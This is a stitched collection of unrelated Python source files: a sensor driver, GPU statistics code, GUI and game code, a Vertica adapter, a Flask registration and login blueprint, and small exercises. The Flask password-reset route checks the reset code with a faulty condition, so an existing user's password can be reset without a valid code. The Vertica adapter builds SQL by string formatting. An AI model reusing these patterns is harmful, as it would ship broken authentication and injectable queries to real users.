col_rename = ''.join(lazy_pinyin(col)) + f'__idx{i}'
cols_name.append(col_rename)
G_hist['FE_kv']['rename'][col_rename] = col
G_df_dict['FE_kv'].columns = cols_name
end = time.time()
remain_time -= (end - start)
log("time consumption: {}".format(str(end - start)))
log("remain_time: {} s".format(remain_time))
return remain_time
|
# MIT License
# Copyright (c) 2017 Philipp Holzer, Karin Aicher
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import smbus
import logging
# SM9541 default address.
SM9541_I2CADDR = 0x28
SM9541_PMIN = -5 # Full Scale Minimum (for SM9541-100C-S-C-3-S)
SM9541_PMAX = 100 # Full Scale Maximum (for SM9541-100C-S-C-3-S)
SM9541_DIGOUTPMIN = 1638 # Pressure Output Minimum
SM9541_DIGOUTPMAX = 14745 # Pressure Output Maximal
class SM9541(object):
def __init__(self):
self._logger = logging.getLogger('SM9541')
self._device = smbus.SMBus(1)
self._sensP = (float)(SM9541_DIGOUTPMAX - SM9541_DIGOUTPMIN) / (
(SM9541_PMAX - SM9541_PMIN))
self._load_calibration()
def _load_calibration(self):
self._device.write_quick(SM9541_I2CADDR)
# Acquire block from sensor
# ToDo: Read only neccessary 4 bytes
def _read_register(self):
# get full 32 byte register of the current block
return self._device.read_i2c_block_data(SM9541_I2CADDR, 0)
# Evaluate field (first 2 bits in first byte)
# 00 ... Normal operation, good data packet
# 01 ... Device in Command Mode (not normal operation)
# 10 ... Stale data: Data that has already been fetched
# 11 ... Diagnostic condition exists
def _read_status(self, values):
return (values[0] & 0xC0) >> 6
def _read_raw_pressure(self, values):
# part 1 (last 6 bits in first byte, shifted away for next bits)
part1 = (values[0] & 0x3F) << 8
# part 2 (8 bits in second byte)
part2 = values[1]
# Concatenate first and second part of the bitstream
return part1 | part2
def _read_raw_temperature(self, values):
# part 1 (shifted away for next bits)
part1 = values[0] << 3
# part 2 (only first three bits)
part2 = (values[1] & 0xE0) >> 5
# Concatenate first and second part of the bitstream
return part1 | part2
def _read_pressure(self, values):
raw_pressure = self._read_raw_pressure(values[:2])
# Pressure from Counts to Scale
return ((float)((raw_pressure - SM9541_DIGOUTPMIN) / self._sensP) +
SM9541_PMIN)
def _read_temperature(self, values):
raw_temperature = self._read_raw_temperature(values[2:4])
# Temperature constant transformation
return ((float)(raw_temperature * 200) / 2048) - 50
def read_all(self):
values = self._read_register()
return [
self._read_status(values),
self._read_pressure(values),
self._read_temperature(values)
]
def read_pressure(self):
values = self._read_register()
return self._read_pressure(values)
def read_temperature(self):
values = self._read_register()
return self._read_temperature(values)
|
def plot_ellipse(position,covariance,ax=None,**kwargs):
if ax is None:
fig, ax = plt.subplots(1,1)
if covariance.shape == (2,2):
U, s, Vt = np.linalg.svd(covariance)
angle = np.degrees(np.arctan2(U[1,0],U[0,0]))
width, height = 2 * np.sqrt(s)
else:
angle = 0
width, height = 2 * np.sqrt(covariance)
# draw ellipse
for nsig in range(1,4):
ax.add_patch(Ellipse(position,nsig*width,nsig*height,angle,**kwargs))
def plot_gmm(gmm,X,label=True,ax=None,dpi=1200,filename=None):
if ax is None:
fig, ax = plt.subplots(1,1)
cluster_id = gmm.fit(X).predict(X)
if isinstance(X,np.ndarray):
x = X[:,0]
y = X[:,1]
elif isinstance(X,pd.DataFrame):
x = X[X.columns[0]]
y = X[X.columns[1]]
if label:
ax.scatter(x,y,c=cluster_id,s=1,cmap='viridis',zorder=2)
else:
ax.scatter(x,y,s=40,zorder=2)
w_factor = 0.2 / gmm.weights_.max()
for pos, covar, w in zip(gmm.means_,gmm.covariances_,gmm.weights_):
plot_ellipse(pos,covar,alpha=w*w_factor,ax=ax,fill=None)
ax.set_xlabel(X.columns[0])
ax.set_ylabel(X.columns[1])
if filename is None:
plt.show()
else:
fig.savefig(filename,dpi=dpi)
|
from numpy.linalg import cholesky as chol
import numpy as np
from numpy import linalg
from pycuda.gpuarray import GPUArray, to_gpu
from pycuda.gpuarray import empty as gpu_empty
import gpustats.kernels as kernels
from gpustats import codegen
from gpustats.util import transpose as gpu_transpose
reload(codegen)
reload(kernels)
import gpustats.util as util
__all__ = ['mvnpdf_multi']
cu_module = codegen.get_full_cuda_module()
def _multivariate_pdf_call(cu_func, data, packed_params, get, order,
datadim=None):
packed_params = util.prep_ndarray(packed_params)
func_regs = cu_func.num_regs
# Prep the data. Skip if gpu data...
if isinstance(data, GPUArray):
padded_data = data
if datadim is None:
n_data, dim = data.shape
else:
n_data, dim = data.shape[0], datadim
else:
n_data, dim = data.shape
padded_data = util.pad_data(data)
n_params = len(packed_params)
data_per, params_per = util.tune_blocksize(
padded_data,
packed_params,
func_regs
)
shared_mem = util.compute_shared_mem(
padded_data,
packed_params,
data_per,
params_per
)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(n_data, data_per),
util.get_boxes(n_params, params_per))
# see cufiles/mvcaller.cu
design = np.array(
(
(data_per, params_per) + # block design
padded_data.shape + # data spec
(dim,) + # non-padded number of data columns
packed_params.shape # params spec
),
dtype=np.int32
)
if n_params == 1:
gpu_dest = gpu_empty(n_data, dtype=np.float32)
else:
gpu_dest = gpu_empty((n_data, n_params), dtype=np.float32, order='F')
# Upload data if not already uploaded
if not isinstance(padded_data, GPUArray):
gpu_padded_data = to_gpu(padded_data)
else:
gpu_padded_data = padded_data
gpu_packed_params = to_gpu(packed_params)
params = (gpu_dest, gpu_padded_data, gpu_packed_params) + tuple(design)
kwargs = dict(block=block_design, grid=grid_design, shared=shared_mem)
cu_func(*params, **kwargs)
gpu_packed_params.gpudata.free()
if get:
if order == 'F':
return gpu_dest.get()
else:
return np.asarray(gpu_dest.get(), dtype=np.float32, order='C')
else:
if order == 'F' or n_params == 1:
return gpu_dest
else:
res = gpu_transpose(
util.gpu_array_reshape(gpu_dest, (n_params, n_data), "C")
)
gpu_dest.gpudata.free()
return res
def mvnpdf_multi(data, means, covs, weights=None, logged=True,
get=True, order="F", datadim=None):
"""
Multivariate normal density with multiple sets of parameters
Parameters
----------
data : ndarray (n x k)
covs : sequence of 2d k x k matrices (length j)
weights : ndarray (length j)
Multiplier for component j, usually will sum to 1
get = False leaves the result on the GPU
without copying back.
If data has already been padded, the original dimension
must be passed in datadim
It data is of GPUarray type, the data is assumed to be
padded, and datadim will need to be passed if padding
was needed.
Returns
-------
densities : n x j
"""
if logged:
cu_func = cu_module.get_function('log_pdf_mvnormal')
else:
cu_func = cu_module.get_function('pdf_mvnormal')
assert(len(covs) == len(means))
ichol_sigmas = [linalg.inv(chol(c)) for c in covs]
logdets = [-2.0*np.log(c.diagonal()).sum() for c in ichol_sigmas]
if weights is None:
weights = np.ones(len(means))
packed_params = _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights)
return _multivariate_pdf_call(cu_func, data, packed_params,
get, order, datadim)
def _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights):
to_pack = []
for m, ch, ld, w in zip(means, ichol_sigmas, logdets, weights):
to_pack.append(_pack_mvnpdf_params_single(m, ch, ld, w))
return np.vstack(to_pack)
def _pack_mvnpdf_params_single(mean, ichol_sigma, logdet, weight=1):
pad_multiple = 16
k = len(mean)
mean_len = k
ichol_len = k * (k + 1) / 2
mch_len = mean_len + ichol_len
packed_dim = util.next_multiple(mch_len + 2, pad_multiple)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = ichol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = weight, logdet
return packed_params
|
import sys
from PyQt5.QtWidgets import *
class MyWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setGeometry(300, 300, 400, 300)
label1 = QLabel(text="고객 ID", parent=self)
label1.resize(150, 30)
label1.move(10, 10)
label2 = QLabel(text="ID 비밀번호", parent=self)
label2.resize(150, 30)
label2.move(10, 50)
label3 = QLabel(text="인증비밀번호", parent=self)
label3.resize(150, 30)
label3.move(10, 90)
app = QApplication(sys.argv)
win = MyWindow()
win.show()
app.exec_()
|
# Requires vertica-python driver: https://pypi.python.org/pypi/vertica-python/
# which also requires the psycopg2 driver: https://github.com/psycopg/psycopg2
# stdlib imports
import os
try:
# Pitfalls:
# 1 - Returns are in lists, not tuples
# 2 - Parameters are to be tuples, not lists
import vertica_python
except ImportError:
pass
# local imports
from db import Db
from errors import DbError
class VerticaDb(Db):
DEFAULT_PORT=5433
@classmethod
def new(cls, config):
super(VerticaDb, cls).new(config)
if 'revision_schema_name' in cls.config:
cls.history_table_name = cls.config['history_table_name']
cls.full_table_name = '"%s"."%s"' % (cls.config['revision_schema_name'],
cls.config['history_table_name'])
else:
raise DbError('No schema found in config file. Please add one with the key: '
'revision_schema_name')
return cls
@classmethod
def init_conn(cls):
try:
vertica_python
except NameError:
raise DbError('Vertica module not found/loaded. Please make sure all dependencies are installed\n')
cls.conn = cls.conn()
cls.cursor = cls.conn.cursor()
cls.conn_initialized = True
return cls
@classmethod
def execute(cls, query, data=None):
if not cls.conn_initialized:
cls.init_conn()
try:
cursor = cls.cursor
cursor.execute('SET search_path TO %s' % cls.config['schema_name'])
if data:
cursor.execute(query, data)
else:
cursor.execute(query)
results = []
if cursor.rowcount > 0 or cursor.rowcount == -1:
try:
results = cursor.fetchall()
except vertica_python.ProgrammingError, e:
raise vertica_python.ProgrammingError(e.message)
cls.conn.commit()
return results
except Exception, e:
raise DbError('Vertica execution error: %s\n. Query: %s - Data: %s\n.'
% (e.message, query, str(data)))
@classmethod
def drop_revision(cls):
return cls.execute('DROP SCHEMA IF EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def create_revision(cls):
# Executing 'CREATE SCHEMA IF NOT EXISTS' fails if the user does not
# have schema creation privileges, even if the schema already exists.
# The correct action is to break this method into two parts: checking
# if the schema exists, and then creating it only if it does not.
#
# The 'IF NOT EXISTS' flag is still used in case the database is
# created after the existence check but before the CREATE statement.
check = "SELECT EXISTS(SELECT 1 FROM v_catalog.SCHEMATA WHERE schema_name = '%s')" % cls.config['revision_schema_name']
result = cls.execute(check)
if result[0] == [True]:
return
else:
return cls.execute('CREATE SCHEMA IF NOT EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def get_commit_history(cls):
return cls.execute('SELECT * FROM %s' % cls.full_table_name)
@classmethod
def append_commit(cls, ref):
return cls.execute('INSERT INTO %s (alter_hash) VALUES (%s)' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_append_commit_query(cls, ref):
return "INSERT INTO %s (alter_hash, ran_on) VALUES ('%s', NOW())" % (cls.full_table_name, ref)
@classmethod
def remove_commit(cls, ref):
return cls.execute('DELETE FROM %s WHERE alter_hash = %s' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_remove_commit_query(cls, ref):
return "DELETE FROM %s WHERE alter_hash = '%s'" % (cls.full_table_name, ref)
@classmethod
def create_history(cls):
return cls.execute("""CREATE TABLE IF NOT EXISTS %s (
id auto_increment NOT NULL,
alter_hash VARCHAR(100) NOT NULL,
ran_on timestamp NOT NULL DEFAULT current_timestamp,
CONSTRAINT pk_%s__id PRIMARY KEY (id),
CONSTRAINT uq_%s__alter_hash UNIQUE (alter_hash) ENABLED
)""" % (cls.full_table_name, cls.history_table_name, cls.history_table_name))
@classmethod
def conn(cls):
"""
return the vertica connection handle to the configured server
"""
config = cls.config
try:
conn_driver_dict = {}
conf_to_driver_map = {'host':'host',
'username':'user',
'password':'password',
'revision_db_name':'database',
'port':'port'}
for conf_key, conf_value in config.iteritems():
try:
driver_key = conf_to_driver_map[conf_key]
driver_value = conf_value
# NOTE: Vertica Python driver requires non-unicode strings
if isinstance(driver_value, unicode):
driver_value = str(driver_value)
conn_driver_dict[driver_key] = driver_value
except KeyError:
pass
conn = vertica_python.connect(**conn_driver_dict)
except Exception, e:
raise DbError("Cannot connect to Vertica Db: %s\n"
"Ensure that the server is running and you can connect normally"
% e.message)
return conn
@classmethod
def run_file_cmd(cls, filename):
"""
return a 3-tuple of strings containing:
the command to run (list)
environment variables to be passed to command (dictionary or None)
data to be piped into stdin (file-like object or None)
"""
port_number = str(cls.config.get('port', VerticaDb.DEFAULT_PORT))
cmd = ['/opt/vertica/bin/vsql',
'-h', cls.config['host'],
'-U', cls.config['username'],
'-p', port_number,
'-v', 'VERBOSITY=verbose',
'-v', 'AUTOCOMMIT=on',
'-v', 'ON_ERROR_STOP=on',
'-v', 'schema=%s' % cls.config['schema_name'],
cls.config['db_name']]
my_env = None
if 'password' in cls.config:
my_env = os.environ.copy()
my_env['VSQL_PASSWORD'] = cls.config['password']
return cmd, my_env, open(filename)
|
import datetime
import functools
def log(func): # 装饰器函数,参数是一个函数
@functools.wraps(func) # 将装饰器修饰过的函数wapper名字改成参数的名字
def wapper(*args, **kw): # wapper是装饰器函数,包含装饰的代码和调用被装饰函数的语句。
print("I am in position.") # 装饰的代码,比如日志打印
func(*args, **kw) # 原始的函数
return wapper # 返回装饰后的函数
@log # 指定那个装饰器
def func(): # 被装饰的函数
print(datetime.datetime.now())
def log1(text): # 装饰器带参数
def decorator(func): # 中间多了一层函数定义
@functools.wraps(func) # 修改装饰函数名称为被装饰的函数名称
def wrapper(*args, **kw):
print('%s %s():'%(text, func.__name__)) # 在装饰器代码中使用了装饰器参数
return func(*args, **kw)
return wrapper
return decorator
@log1("execute") # 函数定义时指定参数
def func1():
print(datetime.datetime.now())
func() # 函数执行结果包含了装饰器新增的代码
print(func.__name__) # 检查装饰后的函数名没被装饰中的中间函数影响
func1() # 调用被装饰过的函数
print(func1.__name__) # 检查装饰后的函数名没被装饰中的中间函数影响
|
import os
import re
from pygame.mixer import Sound
from pygame.sprite import Group
from game.data.enums import InputMode, Screen
from game.data.static import StaticData
class DynamicData():
""" Class which holds all the game variables
"""
def __init__(self):
self.__static= StaticData()
self.__collision_sound = Sound(self.__static.game_sound.get('collision'))
self.__levelup_sound = Sound(self.__static.game_sound.get('levelup'))
self.__shoot_sound = Sound(self.__static.game_sound.get('shoot'))
self.__hit_sound = Sound(self.__static.game_sound.get('hit'))
self.__powerup_sound = Sound(self.__static.game_sound.get('powerup'))
self.__samfire_sound = Sound(self.__static.game_sound.get('samfire'))
self.__game_input = InputMode.KEYBOARD
self.__all_sprites = Group()
self.__bullets = Group()
self.__sam_missiles = Group()
self.__noammo_sprite = None
self.__update_available = False
self.__replay = True
self.__exit = True
self.__update_url = None
self.__player_name = ''
# loading the player name from file, name can be max 20 character long
if os.path.exists(self.__static.player_file):
with open(self.__static.player_file) as file_reader:
name = file_reader.read().strip()[:self.__static.name_length]
self.__player_name = name if name and re.match(r'[a-zA-Z0-9@. ]',name) else ''
self.__active_screen = Screen.NAME_INPUT if not self.__player_name else Screen.GAME_MENU
self.load_defaults()
def load_defaults(self):
self.__ammo = 100
self.__game_level = 1
self.__game_score = 0
self.__game_playtime = 0
self.__bullet_fired = 0
self.__missles_destroyed = 0
self.__sam_missiles.empty()
@property
def collision_sound(self):
return self.__collision_sound
@property
def levelup_sound(self):
return self.__levelup_sound
@property
def shoot_sound(self):
return self.__shoot_sound
@property
def hit_sound(self):
return self.__hit_sound
@property
def powerup_sound(self):
return self.__powerup_sound
@property
def samfire_sound(self):
return self.__samfire_sound
@property
def game_input(self):
return self.__game_input
@game_input.setter
def game_input(self, value):
self.__game_input = value
@property
def all_sprites(self):
return self.__all_sprites
@all_sprites.setter
def all_sprites(self, value):
self.__all_sprites = value
@property
def bullets(self):
return self.__bullets
@bullets.setter
def bullets(self, value):
self.__bullets = value
@property
def sam_missiles(self):
return self.__sam_missiles
@sam_missiles.setter
def sam_missiles(self, value):
self.__sam_missiles = value
@property
def ammo(self):
return self.__ammo
@ammo.setter
def ammo(self, value):
self.__ammo = value if value <= self.__static.max_ammo else self.__static.max_ammo
@property
def noammo_sprite(self):
return self.__noammo_sprite
@noammo_sprite.setter
def noammo_sprite(self, value):
self.__noammo_sprite = value
@property
def game_level(self):
return self.__game_level
@game_level.setter
def game_level(self, value):
self.__game_level = value
@property
def update_available(self):
return self.__update_available
@update_available.setter
def update_available(self, value):
self.__update_available = value
@property
def active_screen(self):
return self.__active_screen
@active_screen.setter
def active_screen(self, value):
self.__active_screen = value
@property
def game_score(self):
return self.__game_score
@game_score.setter
def game_score(self, value):
self.__game_score = value
@property
def game_playtime(self):
return self.__game_playtime
@game_playtime.setter
def game_playtime(self, value):
self.__game_playtime = value
@property
def replay(self):
return self.__replay
@replay.setter
def replay(self, value):
self.__replay = value
@property
def exit(self):
return self.__exit
@exit.setter
def exit(self, value):
self.__exit = value
@property
def player_name(self):
return self.__player_name
@player_name.setter
def player_name(self, value):
self.__player_name = value
# saving the player name to file for future reference
with open(self.__static.player_file, 'w') as file_writter:
file_writter.write(self.__player_name)
@property
def bullets_fired(self):
return self.__bullet_fired
@bullets_fired.setter
def bullets_fired(self, value):
self.__bullet_fired = value
@property
def missiles_destroyed(self):
return self.__missles_destroyed
@missiles_destroyed.setter
def missiles_destroyed(self, value):
self.__missles_destroyed = value
@property
def accuracy(self):
return 0 if self.bullets_fired == 0 else round(self.missiles_destroyed / self.bullets_fired *100, 3)
@property
def update_url(self):
return self.__update_url
@update_url.setter
def update_url(self, value):
self.__update_url = value
|
class TextureNodeCoordinates:
pass
|
import datetime as dt
from src.fetchers.genUnitOutagesFetcher import fetchMajorGenUnitOutages
from src.fetchers.transElOutagesFetcher import fetchTransElOutages
from src.fetchers.longTimeUnrevivedForcedOutagesFetcher import fetchlongTimeUnrevivedForcedOutages
def getWeeklyReportContextObj(appDbConStr: str, startDt: dt.datetime, endDt: dt.datetime) -> dict:
contextObj: dict = {}
contextObj['majorGenOutages'] = fetchMajorGenUnitOutages(
appDbConStr, startDt, endDt)
contextObj['transOutages'] = fetchTransElOutages(
appDbConStr, startDt, endDt)
contextObj['longOutages'] = fetchlongTimeUnrevivedForcedOutages(
appDbConStr, startDt, endDt)
return contextObj
|
import re
import jupyter_kernel_test as jkt
class IMatlabTests(jkt.KernelTests):
kernel_name = "imatlab"
language_name = "matlab"
file_extension = ".m"
code_hello_world = "fprintf('hello, world') % some comment"
code_stderr = "fprintf(2, 'oops')"
completion_samples = [
{"text": "matlabroo", "matches": ["matlabroot"]},
# Not including prefix (only `cursor_start:cursor_end`).
{"text": "ls setup.", "matches": ["setup.cfg", "setup.py"]},
]
complete_code_samples = [
"1+1",
"for i=1:3\ni\nend",
# FIXME The following should be considered "invalid", but really all
# that matters is that they are not "incomplete".
"function test_complete",
"function test_complete, end",
"classdef test_complete, end",
]
incomplete_code_samples = [
"for i=1:3",
# FIXME We'd rather consider this as "invalid".
"classdef test_complete",
]
invalid_code_samples = [
"for end",
]
code_display_data = [
{"code": "set(0, 'defaultfigurevisible', 'off'); "
"imatlab_export_fig('print-png'); "
"plot([1, 2]);",
"mime": "image/png"},
]
code_inspect_sample = "help"
# FIXME We actually never send "data" back -- only print it.
# code_generate_error = "[1, 2] + [3, 4, 5];"
# code_execute_result = [
# {"code": "1+1;", "result": ""},
# ]
# FIXME History operations are not tested as (as mentioned in the docs)
# they are unnecessary (re-implemented by the frontends, overly complex).
# supported_history_operations = ["tail", "range", "search"]
# code_history_pattern = [
# re.escape("1+1"),
# ]
# FIXME Not available.
# code_page_something = None
# code_clear_output = None
|
from typing import Any, Dict
import sharepy
from ..config import local_config
from ..exceptions import CredentialError
from .base import Source
class Sharepoint(Source):
"""
A Sharepoint class to connect and download specific Excel file from Sharepoint.
Args:
credentials (dict): In credentials should be included:
"site" - Path to sharepoint website (e.g : {tenant_name}.sharepoint.com)
"username" - Sharepoint username (e.g username@{tenant_name}.com)
"password"
download_from_path (str, optional): Full url to file
(e.g : https://{tenant_name}.sharepoint.com/sites/{directory}/Shared%20Documents/Dashboard/file). Defaults to None.
"""
def __init__(
self,
credentials: Dict[str, Any] = None,
download_from_path: str = None,
*args,
**kwargs,
):
DEFAULT_CREDENTIALS = local_config.get("SHAREPOINT")
credentials = credentials or DEFAULT_CREDENTIALS
if credentials is None:
raise CredentialError("Credentials not found.")
self.url = download_from_path
self.required_credentials = ["site", "username", "password"]
super().__init__(*args, credentials=credentials, **kwargs)
def get_connection(self) -> sharepy.session.SharePointSession:
if any([rq not in self.credentials for rq in self.required_credentials]):
raise CredentialError("Missing credentials.")
return sharepy.connect(
site=self.credentials["site"],
username=self.credentials["username"],
password=self.credentials["password"],
)
def download_file(
self,
download_from_path: str = None,
download_to_path: str = "Sharepoint_file.xlsm",
) -> None:
download_from_path = download_from_path or self.url
if not download_from_path:
raise ValueError("Missing required parameter 'download_from_path'.")
conn = self.get_connection()
conn.getfile(
url=download_from_path,
filename=download_to_path,
)
|
x = int(input())
z = int(input())
sum = int(0)
cake = x * z
while True:
piece = input()
if piece != "STOP":
piece = float(piece)
piece = int(piece)
sum += piece
if sum > cake:
print (f"No more cake left! You need {sum - cake} pieces more.")
break
if piece == "STOP":
if sum <= cake:
print (f"{cake - sum} pieces are left.")
break
else:
print (f"No more cake left! You need {sum - cake} pieces more.")
break
|
from flask import Blueprint, render_template, session, redirect, url_for, abort, request
import bcrypt
import os
from feed.forms import FeedPostForm
from settings import Config
from werkzeug.utils import secure_filename
import uuid
from user.decorators import login_required
from user.forms import RegisterForm, LoginForm, EditForm, ForgotForm, PasswordResetForm
from user.models import User
from feed.models import Message, Feed
from relationship.models import Relationship, RELATIONSHIP_TYPE, STATUS_TYPE, FRIENDS, PENDING, APPROVED, BLOCKED
from utils.commons import email
from utils.image_upload import thumbnail_process
user_blueprint = Blueprint('user_blueprint', __name__)
@user_blueprint.route('/')
def home():
if session.get('username'):
form = FeedPostForm()
user = User.getByName(session.get('username'))
feed_messages = Feed.get_feed(user.id)
return render_template('home/feed_home.html',
user=user,
form=form,
feed_messages=feed_messages
)
else:
return render_template('home/home.html')
@user_blueprint.route('/<username>/friends/<int:friends_page_number>', endpoint='profile-friends-page')
@user_blueprint.route('/<username>/friends', endpoint='profile-friends')
@user_blueprint.route('/profile/<string:username>')
def profile(username, friends_page_number=1):
logged_user = None
rel = None
friends_page = False
friends_per_page = 3
profile_messages = []
user = User.getByName(username)
if user:
if session['username']:
logged_user = User.getByName(session['username'])
rel = Relationship.get_relationship_status(logged_user.id, user.id)
# get user friends
friends_list = Relationship.get_friends(
user=logged_user.id,
rel_type=RELATIONSHIP_TYPE.get(FRIENDS),
status=STATUS_TYPE.get(APPROVED)
)
friends_total = len(friends_list)
if 'friends' in request.url:
friends_page = True
# pagination
limit = friends_per_page * friends_page_number
offset = limit - friends_per_page
if friends_total >= limit:
friends = friends_list[offset:limit]
else:
friends = friends_list[offset:friends_total]
else:
if friends_total >= 5:
friends = friends_list[:5]
else:
friends = friends_list
form = FeedPostForm()
if logged_user and (rel == "SAME" or rel == "FRIENDS_APPROVED"):
profile_messages = Message.getMessages(logged_user.id)
return render_template('user/profile.html',
user=user,
logged_user=logged_user,
rel=rel,
friends=friends,
friends_total=friends_total,
friends_page=friends_page,
form=form,
profile_messages=profile_messages
)
else:
abort(404)
@user_blueprint.route('/edit', methods=['POST', 'GET'])
@login_required
def edit():
error = None
message = None
user = User.getByName(session['username'])
if user:
form = EditForm(obj=user)
if form.validate_on_submit():
image_ts = None
if request.files.get('image'):
filename = secure_filename(form.image.data.filename)
folder_path = os.path.join(Config.UPLOAD_FOLDER, 'user_' + user.id)
file_path = os.path.join(folder_path, filename)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
form.image.data.save(file_path)
image_ts = str(thumbnail_process(file_path, 'user_' + user.id, str(user.id)))
if user.username != form.username.data.lower():
if User.getByName(form.username.data.lower()):
error = "This username is already in use."
else:
session['username'] = form.username.data.lower()
user.username = form.username.data.lower()
if user.email != form.email.data.lower():
if User.getByEmail(form.email.data.lower()):
error = "This email is already in use."
else:
code = str(uuid.uuid4())
user.change_configuration = {
"new_email": form.email.data.lower(),
"confirmation_code": code
}
user.email_confirmation = False
message = "You will need to confirm the new email to complete this change"
# email the user
body_html = render_template('mail/user/change_email.html', user=user)
body_text = render_template('mail/user/change_email.txt', user=user)
email(user.change_configuration['new_email'], "Confirm your new email", body_html, body_text)
if not error:
form.populate_obj(user)
if image_ts:
user.profile_image = image_ts
user.update_record()
if message:
return redirect(url_for('.logout'))
else:
message = "Your info has been updated succefully ..!"
return render_template('user/edit.html', form=form, error=error, message=message, user=user)
else:
abort(404)
@user_blueprint.route('/logout', methods=['GET'])
def logout():
session['username'] = ''
return redirect(url_for('.login'))
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
error = None
if form.validate_on_submit():
user = User.getByName(form.username.data)
if user.email_confirmation:
if user and bcrypt.hashpw(form.password.data, user.password) == user.password:
session['username'] = user.username
return redirect(url_for('.profile', username=user.username))
error = "Incorrect Credentials"
else:
error = "Check you email to complete your registration"
return render_template("user/login.html", form=form, error=error)
@user_blueprint.route('/register', methods=('GET', 'POST'))
def register():
form = RegisterForm()
message = None
if form.validate_on_submit():
salt = bcrypt.gensalt()
code = str(uuid.uuid4().hex)
hashed_password = bcrypt.hashpw(form.password.data, salt)
user = User(username=form.username.data,
password=hashed_password,
email=form.email.data,
first_name=form.first_name.data,
last_name=form.last_name.data,
bio=form.bio.data,
change_configuration={
"new_email": form.email.data.lower(),
"confirmation_code": code
})
user.save_database()
# send email
html_body = render_template('mail/user/register.html', user=user)
html_text = render_template('mail/user/register.txt', user=user)
email(user.change_configuration['new_email'], "Confirm your email", html_body, html_text)
message = "Please Check you email to complete registration."
return render_template('user/register.html', form=form, message=message)
return render_template('user/register.html', form=form, message=message)
@user_blueprint.route('/confirm/<string:username>/<string:code>', methods=('GET', 'POST'))
def confirm(username, code):
user = User.getByName(username)
if user and user.change_configuration and user.change_configuration.get("confirmation_code"):
if user.change_configuration.get("confirmation_code") == code:
user.email = user.change_configuration.get("new_email")
user.change_configuration = {}
user.email_confirmation = True
user.update_record()
return render_template('user/email_confirmed.html')
else:
abort(404)
@user_blueprint.route('/forgot', methods=['GET', 'POST'])
def forgot():
error = None
message = None
form = ForgotForm()
if form.validate_on_submit():
user = User.getByEmail(form.email.data)
if user:
code = str(uuid.uuid4().hex)
user.change_configuration = {
"password_reset_code": code,
}
user.update_record()
html_body = render_template('mail/user/password_reset.html', user=user)
html_text = render_template('mail/user/password_reset.txt', user=user)
email(user.email, "Password Reset Request", html_body, html_text)
message = "You will receive a password reset email if we find that email in our system"
return render_template('user/forgot.html', form=form, message=message, error=error)
# change password when you are not logged in -> from forgot password
@user_blueprint.route('/password_reset/<string:username>/<string:code>', methods=['GET', 'POST'])
def password_reset(username, code):
require_current = None
message = None
form = PasswordResetForm()
user = User.getByName(username)
if not user and user.change_configuration.get('password_reset_code') != code:
abort(404)
if request.method == 'POST':
del form.current_password
if form.validate_on_submit():
if form.password.data == form.confirm.data:
salt = bcrypt.gensalt()
hashed_password = bcrypt.hashpw(form.password.data, salt)
user.password = hashed_password
user.change_configuration = {}
user.update_record()
if session.get('username'):
session['username'] = ''
return redirect(url_for('.password_reset_complete'))
return render_template('user/password_reset.html',
form=form,
message=message,
require_current=require_current,
username=username,
code=code
)
@user_blueprint.route('/password_reset_complete')
def password_reset_complete():
return render_template('user/password_change_confirmed.html')
# change password when you are logged in
@user_blueprint.route('/change_password', methods=['GET', 'POST'])
def change_password():
require_current = True
error = None
form = PasswordResetForm()
user = User.getByName(username=session.get('username'))
if not user:
abort(404)
if request.method == 'POST':
if form.validate_on_submit():
if bcrypt.hashpw(form.current_password.data, user.password) == user.password:
salt = bcrypt.gensalt()
hashed_password = bcrypt.hashpw(form.password.data, salt)
user.password = hashed_password
user.update_record()
# if user is logged in, log him out
if session.get('username'):
session.pop('username')
return redirect(url_for('.password_reset_complete')), 302
else:
error = "Incorrect password"
return render_template('user/password_reset.html',
form=form,
require_current=require_current,
error=error
)
|
"""*********************************************************************
* *
* Description: Implementing a python client for proxy list *
* Date: 12/05/2021 *
* Author: Marcos Vinicios da Silveira *
* *
************************************************************************
"""
import os
import re
import sys
from codecs import open
from setuptools import setup
from setuptools.command.test import test as TestCommand
BASE = os.path.abspath(os.path.dirname(__file__))
# 'setup.py publish' shortcut.
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
sys.exit()
packages = ['proxy_list', 'tests']
requires = []
test_requirements = []
about = {}
with open(os.path.join(BASE, 'proxy_list', '__version__.py'), 'r', 'utf-8') as f:
exec(f.read(), about)
with open('README.md', 'r', 'utf-8') as f:
readme = f.read()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=readme,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
packages=packages,
include_package_data=True,
python_requires=">=3.4",
install_requires=requires,
license=about['__license__'],
tests_require=test_requirements,
)
# end-of-file
|
import itertools
import time
from printer import GridPrinter
class SudokuSolver:
def __init__(self, grid):
self.grid = grid
